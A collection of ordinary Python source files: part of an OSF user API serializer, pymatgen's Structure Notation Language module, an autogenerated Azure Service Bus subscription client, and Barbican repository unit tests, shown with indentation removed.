))
class Meta:
type_ = 'users'
def get_projects_in_common(self, obj):
user = get_user_auth(self.context['request']).user
if obj == user:
return user.contributor_to.count()
return obj.n_projects_in_common(user)
def absolute_url(self, obj):
if obj is not None:
return obj.absolute_url
return None
def get_absolute_url(self, obj):
return absolute_reverse('users:user-detail', kwargs={
'user_id': obj._id,
'version': self.context['request'].parser_context['kwargs']['version']
})
def get_can_view_reviews(self, obj):
group_qs = GroupObjectPermission.objects.filter(group__user=obj, permission__codename='view_submissions')
return group_qs.exists() or obj.userobjectpermission_set.filter(permission__codename='view_submissions')
def get_accepted_terms_of_service(self, obj):
return bool(obj.accepted_terms_of_service)
def profile_image_url(self, user):
size = self.context['request'].query_params.get('profile_image_size')
return user.profile_image_url(size=size)
def validate_employment(self, value):
validate_user_json(value, 'employment-schema.json')
return value
def validate_education(self, value):
validate_user_json(value, 'education-schema.json')
return value
def update(self, instance, validated_data):
assert isinstance(instance, OSFUser), 'instance must be a User'
for attr, value in validated_data.items():
if 'social' == attr:
for key, val in value.items():
# currently only profileWebsites are a list, the rest of the social key only has one value
if key == 'profileWebsites':
instance.social[key] = val
else:
if len(val) > 1:
raise InvalidModelValueError(
detail='{} only accept a list of one single value'. format(key)
)
instance.social[key] = val[0]
elif 'accepted_terms_of_service' == attr:
if value and not instance.accepted_terms_of_service:
instance.accepted_terms_of_service = timezone.now()
else:
setattr(instance, attr, value)
try:
instance.save()
except ValidationValueError as e:
raise InvalidModelValueError(detail=e.message)
except ValidationError as e:
raise InvalidModelValueError(e)
return instance
class UserAddonSettingsSerializer(JSONAPISerializer):
"""
Overrides UserSerializer to make id required.
"""
id = ser.CharField(source='config.short_name', read_only=True)
user_has_auth = ser.BooleanField(source='has_auth', read_only=True)
links = LinksField({
'self': 'get_absolute_url',
'accounts': 'account_links'
})
class Meta:
type_ = 'user_addons'
def get_absolute_url(self, obj):
return absolute_reverse(
'users:user-addon-detail',
kwargs={
'provider': obj.config.short_name,
'user_id': self.context['request'].parser_context['kwargs']['user_id'],
'version': self.context['request'].parser_context['kwargs']['version']
}
)
def account_links(self, obj):
# TODO: [OSF-4933] remove this after refactoring Figshare
if hasattr(obj, 'external_accounts'):
return {
account._id: {
'account': absolute_reverse('users:user-external_account-detail', kwargs={
'user_id': obj.owner._id,
'provider': obj.config.short_name,
'account_id': account._id,
'version': self.context['request'].parser_context['kwargs']['version']
}),
'nodes_connected': [n.absolute_api_v2_url for n in obj.get_attached_nodes(account)]
}
for account in obj.external_accounts.all()
}
return {}
class UserDetailSerializer(UserSerializer):
"""
Overrides UserSerializer to make id required.
"""
id = IDField(source='_id', required=True)
class UserQuickFilesSerializer(QuickFilesSerializer):
links = LinksField({
'info': Link('files:file-detail', kwargs={'file_id': '<_id>'}),
'upload': WaterbutlerLink(),
'delete': WaterbutlerLink(),
'move': WaterbutlerLink(),
'download': WaterbutlerLink(must_be_file=True),
})
class ReadEmailUserDetailSerializer(UserDetailSerializer):
email = ser.CharField(source='username', read_only=True)
class RelatedInstitution(JSONAPIRelationshipSerializer):
id = ser.CharField(required=False, allow_null=True, source='_id')
class Meta:
type_ = 'institutions'
def get_absolute_url(self, obj):
return obj.absolute_api_v2_url
class UserInstitutionsRelationshipSerializer(BaseAPISerializer):
data = ser.ListField(child=RelatedInstitution())
links = LinksField({'self': 'get_self_url',
'html': 'get_related_url'})
def get_self_url(self, obj):
return absolute_reverse('users:user-institutions-relationship', kwargs={
'user_id': obj['self']._id,
'version': self.context['request'].parser_context['kwargs']['version']
})
def get_related_url(self, obj):
return absolute_reverse('users:user-institutions', kwargs={
'user_id': obj['self']._id,
'version': self.context['request'].parser_context['kwargs']['version']
})
def get_absolute_url(self, obj):
return obj.absolute_api_v2_url
class Meta:
type_ = 'institutions'
class UserIdentitiesSerializer(JSONAPISerializer):
id = IDField(source='_id', read_only=True)
type = TypeField()
external_id = ser.CharField(read_only=True)
status = ser.CharField(read_only=True)
links = LinksField({
'self': 'get_absolute_url',
})
def get_absolute_url(self, obj):
return absolute_reverse(
'users:user-identities-detail',
kwargs={
'user_id': self.context['request'].parser_context['kwargs']['user_id'],
'version': self.context['request'].parser_context['kwargs']['version'],
'identity_id': obj['_id']
}
)
class Meta:
type_ = 'external-identities'
class UserAccountExportSerializer(BaseAPISerializer):
type = TypeField()
class Meta:
type_ = 'user-account-export-form'
class UserAccountDeactivateSerializer(BaseAPISerializer):
type = TypeField()
class Meta:
type_ = 'user-account-deactivate-form'
| |
# coding: utf-8
from __future__ import unicode_literals
"""
Classes and methods related to the Structure Notation Language (SNL)
"""
__author__ = 'Anubhav Jain, Shyue Ping Ong'
__credits__ = 'Dan Gunter'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 11, 2013'
import sys
import re
import datetime
from collections import namedtuple
import json
from six.moves import map, cStringIO
from six import string_types
from monty.json import MontyDecoder, MontyEncoder
from monty.string import remove_non_ascii
from pymatgen.core.structure import Structure, Molecule
from pybtex.database.input import bibtex
from pybtex import errors
MAX_HNODE_SIZE = 64000 # maximum size (bytes) of SNL HistoryNode
MAX_DATA_SIZE = 256000 # maximum size (bytes) of SNL data field
MAX_HNODES = 100 # maximum number of HistoryNodes in SNL file
MAX_BIBTEX_CHARS = 20000 # maximum number of characters for BibTeX reference
def is_valid_bibtex(reference):
"""
Use pybtex to validate that a reference is in proper BibTeX format
Args:
reference: A String reference in BibTeX format.
Returns:
Boolean indicating if reference is valid bibtex.
"""
# str is necessary since pybtex seems to have an issue with unicode. The
# filter expression removes all non-ASCII characters.
sio = cStringIO(remove_non_ascii(reference))
parser = bibtex.Parser()
errors.set_strict_mode(False)
bib_data = parser.parse_stream(sio)
return len(bib_data.entries) > 0
class HistoryNode(namedtuple('HistoryNode', ['name', 'url', 'description'])):
"""
A HistoryNode represents a step in the chain of events that lead to a
Structure. HistoryNodes leave 'breadcrumbs' so that you can trace back how
a Structure was created. For example, a HistoryNode might represent pulling
a Structure from an external database such as the ICSD or CSD. Or, it might
represent the application of a code (e.g. pymatgen) to the Structure, with
a custom description of how that code was applied (e.g. a site removal
Transformation was applied).
A HistoryNode contains three fields:
.. attribute:: name
The name of a code or resource that this Structure encountered in
its history (String)
.. attribute:: url
The URL of that code/resource (String)
.. attribute:: description
A free-form description of how the code/resource is related to the
Structure (dict).
"""
def as_dict(self):
return {"name": self.name, "url": self.url,
"description": self.description}
@staticmethod
def from_dict(h_node):
return HistoryNode(h_node['name'], h_node['url'],
h_node['description'])
@staticmethod
def parse_history_node(h_node):
"""
Parses a History Node object from either a dict or a tuple.
Args:
h_node: A dict with name/url/description fields or a 3-element
tuple.
Returns:
History node.
"""
if isinstance(h_node, dict):
return HistoryNode.from_dict(h_node)
else:
if len(h_node) != 3:
raise ValueError("Invalid History node, "
"should be dict or (name, version, "
"description) tuple: {}".format(h_node))
return HistoryNode(h_node[0], h_node[1], h_node[2])
class Author(namedtuple('Author', ['name', 'email'])):
"""
An Author contains two fields:
.. attribute:: name
Name of author (String)
.. attribute:: email
Email of author (String)
"""
def __str__(self):
"""
String representation of an Author
"""
return '{} <{}>'.format(self.name, self.email)
def as_dict(self):
return {"name": self.name, "email": self.email}
@staticmethod
def from_dict(d):
return Author(d['name'], d['email'])
@staticmethod
def parse_author(author):
"""
Parses an Author object from either a String, dict, or tuple
Args:
author: A String formatted as "NAME <email@domain.com>",
(name, email) tuple, or a dict with name and email keys.
Returns:
An Author object.
"""
if isinstance(author, string_types):
# Regex looks for whitespace, (any name), whitespace, <, (email),
# >, whitespace
m = re.match('\s*(.*?)\s*<(.*?@.*?)>\s*', author)
if not m or m.start() != 0 or m.end() != len(author):
raise ValueError("Invalid author format! {}".format(author))
return Author(m.groups()[0], m.groups()[1])
elif isinstance(author, dict):
return Author.from_dict(author)
else:
if len(author) != 2:
raise ValueError("Invalid author, should be String or (name, "
"email) tuple: {}".format(author))
return Author(author[0], author[1])
class StructureNL(object):
"""
The Structure Notation Language (SNL, pronounced 'snail') is container
for a pymatgen Structure/Molecule object with some additional fields for
enhanced provenance. It is meant to be imported/exported in a JSON file
format with the following structure:
- about
- created_at
- authors
- projects
- references
- remarks
- data
- history
- lattice (optional)
- sites
Args:
struct_or_mol: A pymatgen.core.structure Structure/Molecule object
authors: *List* of {"name":'', "email":''} dicts,
*list* of Strings as 'John Doe <johndoe@gmail.com>',
or a single String with commas separating authors
projects: List of Strings ['Project A', 'Project B']
references: A String in BibTeX format
remarks: List of Strings ['Remark A', 'Remark B']
data: A free form dict. Namespaced at the root level with an
underscore, e.g. {"_materialsproject": <custom data>}
history: List of dicts - [{'name':'', 'url':'', 'description':{}}]
created_at: A datetime object
"""
def __init__(self, struct_or_mol, authors, projects=None, references='',
remarks=None, data=None, history=None, created_at=None):
# initialize root-level structure keys
self.structure = struct_or_mol
# turn authors into list of Author objects
authors = authors.split(',')\
if isinstance(authors, string_types) else authors
self.authors = [Author.parse_author(a) for a in authors]
# turn projects into list of Strings
projects = projects if projects else []
self.projects = [projects] \
if isinstance(projects, string_types) else projects
# check that references are valid BibTeX
if references and not is_valid_bibtex(references):
raise ValueError("Invalid format for SNL reference! Should be "
"BibTeX string.")
if len(references) > MAX_BIBTEX_CHARS:
raise ValueError("The BibTeX string must be fewer than {} chars "
", you have {}"
.format(MAX_BIBTEX_CHARS, len(references)))
self.references = references
# turn remarks into list of Strings
remarks = remarks if remarks else []
self.remarks = [remarks] if isinstance(remarks, string_types) \
else remarks
# check remarks limit
for r in self.remarks:
if len(r) > 140:
raise ValueError("The remark exceeds the maximum size of"
"140 characters: {}".format(r))
# check data limit
self.data = data if data else {}
if not sys.getsizeof(self.data) < MAX_DATA_SIZE:
raise ValueError("The data dict exceeds the maximum size limit of"
" {} bytes (you have {})"
.format(MAX_DATA_SIZE, sys.getsizeof(data)))
for k, v in self.data.items():
if not k.startswith("_"):
raise ValueError("data must contain properly namespaced data "
"with keys starting with an underscore. The "
"key {} does not start with an underscore.",
format(k))
# check for valid history nodes
history = history if history else [] # initialize null fields
if len(history) > MAX_HNODES:
raise ValueError("A maximum of {} History nodes are supported, "
"you have {}!".format(MAX_HNODES, len(history)))
self.history = [HistoryNode.parse_history_node(h) for h in history]
if not all([sys.getsizeof(h) < MAX_HNODE_SIZE for h in history]):
raise ValueError("One or more history nodes exceeds the maximum "
"size limit of {} bytes".format(MAX_HNODE_SIZE))
self.created_at = created_at if created_at \
else datetime.datetime.utcnow()
def as_dict(self):
d = self.structure.as_dict()
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["about"] = {"authors": [a.as_dict() for a in self.authors],
"projects": self.projects,
"references": self.references,
"remarks": self.remarks,
"history": [h.as_dict() for h in self.history],
"created_at": json.loads(json.dumps(self.created_at,
cls=MontyEncoder))}
d["about"].update(json.loads(json.dumps(self.data,
cls=MontyEncoder)))
return d
@classmethod
def from_dict(cls, d):
a = d["about"]
dec = MontyDecoder()
created_at = dec.process_decoded(a.get("created_at"))
data = {k: v for k, v in d["about"].items()
if k.startswith("_")}
data = dec.process_decoded(data)
structure = Structure.from_dict(d) if "lattice" in d \
else Molecule.from_dict(d)
return cls(structure, a["authors"], projects=a.get("projects", None),
references=a.get("references", ""),
remarks=a.get("remarks", None), data=data,
history=a.get("history", None), created_at=created_at)
@classmethod
def from_structures(cls, structures, authors, projects=None,
references='', remarks=None, data=None,
histories=None, created_at=None):
"""
A convenience method for getting a list of StructureNL objects by
specifying structures and metadata separately. Some of the metadata
is applied to all of the structures for ease of use.
Args:
structures: A list of Structure objects
authors: *List* of {"name":'', "email":''} dicts,
*list* of Strings as 'John Doe <johndoe@gmail.com>',
or a single String with commas separating authors
projects: List of Strings ['Project A', 'Project B']. This
applies to all structures.
references: A String in BibTeX format. Again, this applies to all
structures.
remarks: List of Strings ['Remark A', 'Remark B']
data: A list of free form dict. Namespaced at the root level
with an underscore, e.g. {"_materialsproject":<custom data>}
. The length of data should be the same as the list of
structures if not None.
histories: List of list of dicts - [[{'name':'', 'url':'',
'description':{}}], ...] The length of histories should be the
same as the list of structures if not None.
created_at: A datetime object
"""
data = [{}] * len(structures) if data is None else data
histories = [[]] * len(structures) if histories is None else \
histories
snl_list = []
for i, struct in enumerate(structures):
snl = StructureNL(struct, authors, projects=projects,
references=references,
remarks=remarks, data=data[i],
history=histories[i],
created_at=created_at)
snl_list.append(snl)
return snl_list
def __str__(self):
return "\n".join(["{}\n{}".format(k, getattr(self, k))
for k in ("structure", "authors", "projects",
"references", "remarks", "data", "history",
"created_at")])
def __eq__(self, other):
return all(map(lambda n: getattr(self, n) == getattr(other, n),
("structure", "authors", "projects", "references",
"remarks", "data", "history", "created_at")))
def __ne__(self, other):
return not self.__eq__(other)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SubscriptionsOperations:
"""SubscriptionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.servicebus.v2017_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_topic(
self,
resource_group_name: str,
namespace_name: str,
topic_name: str,
skip: Optional[int] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SBSubscriptionListResult"]:
"""List all the subscriptions under a specified topic.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param topic_name: The topic name.
:type topic_name: str
:param skip: Skip is only used if a previous operation returned a partial result. If a previous
response contains a nextLink element, the value of the nextLink element will include a skip
parameter that specifies a starting point to use for subsequent calls.
:type skip: int
:param top: May be used to limit the number of results to the most recent N usageDetails.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SBSubscriptionListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.servicebus.v2017_04_01.models.SBSubscriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBSubscriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-04-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_topic.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', maximum=1000, minimum=0)
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int', maximum=1000, minimum=1)
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SBSubscriptionListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_topic.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
namespace_name: str,
topic_name: str,
subscription_name: str,
parameters: "_models.SBSubscription",
**kwargs: Any
) -> "_models.SBSubscription":
"""Creates a topic subscription.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param topic_name: The topic name.
:type topic_name: str
:param subscription_name: The subscription name.
:type subscription_name: str
:param parameters: Parameters supplied to create a subscription resource.
:type parameters: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SBSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-04-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SBSubscription')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SBSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
namespace_name: str,
topic_name: str,
subscription_name: str,
**kwargs: Any
) -> None:
"""Deletes a subscription from the specified topic.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param topic_name: The topic name.
:type topic_name: str
:param subscription_name: The subscription name.
:type subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-04-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'} # type: ignore
async def get(
self,
resource_group_name: str,
namespace_name: str,
topic_name: str,
subscription_name: str,
**kwargs: Any
) -> "_models.SBSubscription":
"""Returns a subscription description for the specified topic.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param topic_name: The topic name.
:type topic_name: str
:param subscription_name: The subscription name.
:type subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SBSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2017_04_01.models.SBSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SBSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-04-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'topicName': self._serialize.url("topic_name", topic_name, 'str', min_length=1),
'subscriptionName': self._serialize.url("subscription_name", subscription_name, 'str', max_length=50, min_length=1),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SBSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/topics/{topicName}/subscriptions/{subscriptionName}'} # type: ignore
| |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import sqlalchemy
from barbican.common import config
from barbican.common import exception
from barbican.model import models
from barbican.model import repositories
from barbican.tests import database_utils
from barbican.tests import utils
class WhenCleaningRepositoryPagingParameters(utils.BaseTestCase):
def setUp(self):
super(WhenCleaningRepositoryPagingParameters, self).setUp()
self.CONF = config.CONF
self.default_limit = self.CONF.default_limit_paging
def test_parameters_not_assigned(self):
"""The cleaner should use defaults when params are not specified."""
clean_offset, clean_limit = repositories.clean_paging_values()
self.assertEqual(clean_offset, 0)
self.assertEqual(self.default_limit, clean_limit)
def test_limit_as_none(self):
"""When Limit is set to None it should use the default limit."""
offset = 0
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg=offset,
limit_arg=None)
self.assertEqual(clean_offset, offset)
self.assertEqual(self.default_limit, clean_limit)
def test_offset_as_none(self):
"""When Offset is set to None it should use an offset of 0."""
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg=None,
limit_arg=self.default_limit)
self.assertEqual(0, clean_offset)
self.assertEqual(self.default_limit, clean_limit)
def test_limit_as_uncastable_str(self):
"""When Limit cannot be cast to an int, expect the default."""
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg=0,
limit_arg='boom')
self.assertEqual(clean_offset, 0)
self.assertEqual(self.default_limit, clean_limit)
def test_offset_as_uncastable_str(self):
"""When Offset cannot be cast to an int, it should be zero."""
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg='boom',
limit_arg=self.default_limit)
self.assertEqual(clean_offset, 0)
self.assertEqual(self.default_limit, clean_limit)
def test_limit_is_less_than_one(self):
"""Offset should default to 1."""
limit = -1
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg=1,
limit_arg=limit)
self.assertEqual(clean_offset, 1)
self.assertEqual(clean_limit, 1)
def test_limit_ist_too_big(self):
"""Limit should max out at configured value."""
limit = self.CONF.max_limit_paging + 10
clean_offset, clean_limit = repositories.clean_paging_values(
offset_arg=1,
limit_arg=limit)
self.assertEqual(self.CONF.max_limit_paging, clean_limit)
class WhenInvokingExceptionMethods(utils.BaseTestCase):
def setUp(self):
super(WhenInvokingExceptionMethods, self).setUp()
self.CONF = config.CONF
self.entity_id = '123456'
self.entity_name = 'test_entity'
def test_should_raise_for_entity_not_found(self):
exception_result = self.assertRaises(
exception.NotFound,
repositories._raise_entity_not_found,
self.entity_name,
self.entity_id)
self.assertEqual(
"No test_entity found with ID 123456",
exception_result.message)
def test_should_raise_for_entity_id_not_found(self):
exception_result = self.assertRaises(
exception.NotFound,
repositories._raise_entity_id_not_found,
self.entity_id)
self.assertEqual(
"Entity ID 123456 not found",
exception_result.message)
def test_should_raise_for_no_entities_found(self):
exception_result = self.assertRaises(
exception.NotFound,
repositories._raise_no_entities_found,
self.entity_name)
self.assertEqual(
"No entities of type test_entity found",
exception_result.message)
def test_should_raise_for_entity_already_exists(self):
exception_result = self.assertRaises(
exception.Duplicate,
repositories._raise_entity_already_exists,
self.entity_name)
self.assertEqual(
"Entity 'test_entity' already exists",
exception_result.message)
class WhenTestingBaseRepository(database_utils.RepositoryTestCase):
def setUp(self):
super(WhenTestingBaseRepository, self).setUp()
self.repo = repositories.BaseRepo()
def test_should_raise_invalid_create_from_no_entity(self):
exception_result = self.assertRaises(
exception.Invalid,
self.repo.create_from,
None)
self.assertEqual(
"Must supply non-None Entity.",
exception_result.message)
def test_should_raise_invalid_create_from_entity_with_id(self):
entity = models.ModelBase()
entity.id = '1234'
exception_result = self.assertRaises(
exception.Invalid,
self.repo.create_from,
entity)
self.assertEqual(
"Must supply Entity with id=None (i.e. new entity).",
exception_result.message)
def test_should_raise_invalid_do_validate_no_status(self):
exception_result = self.assertRaises(
exception.Invalid,
self.repo._do_validate,
{})
self.assertEqual(
"Entity status is required.",
exception_result.message)
def test_should_raise_invalid_do_validate_bad_status(self):
exception_result = self.assertRaises(
exception.Invalid,
self.repo._do_validate,
dict(status='BOGUS_STATUS'))
self.assertEqual(
"Invalid status 'BOGUS_STATUS' for Entity.",
exception_result.message)
class WhenTestingWrapDbError(utils.BaseTestCase):
def setUp(self):
super(WhenTestingWrapDbError, self).setUp()
repositories.CONF.set_override("sql_max_retries", 0)
repositories.CONF.set_override("sql_retry_interval", 0)
@mock.patch('barbican.model.repositories.is_db_connection_error')
def test_should_raise_operational_error_is_connection_error(
self, mock_is_db_error):
mock_is_db_error.return_value = True
@repositories.wrap_db_error
def test_function():
raise sqlalchemy.exc.OperationalError(
'statement', 'params', 'orig')
self.assertRaises(
sqlalchemy.exc.OperationalError,
test_function)
class WhenTestingGetEnginePrivate(utils.BaseTestCase):
def setUp(self):
super(WhenTestingGetEnginePrivate, self).setUp()
repositories.CONF.set_override("sql_connection", "connection")
@mock.patch('barbican.model.repositories._create_engine')
def test_should_raise_value_exception_engine_create_failure(
self, mock_create_engine):
engine = mock.MagicMock()
engine.connect.side_effect = ValueError('Abort!')
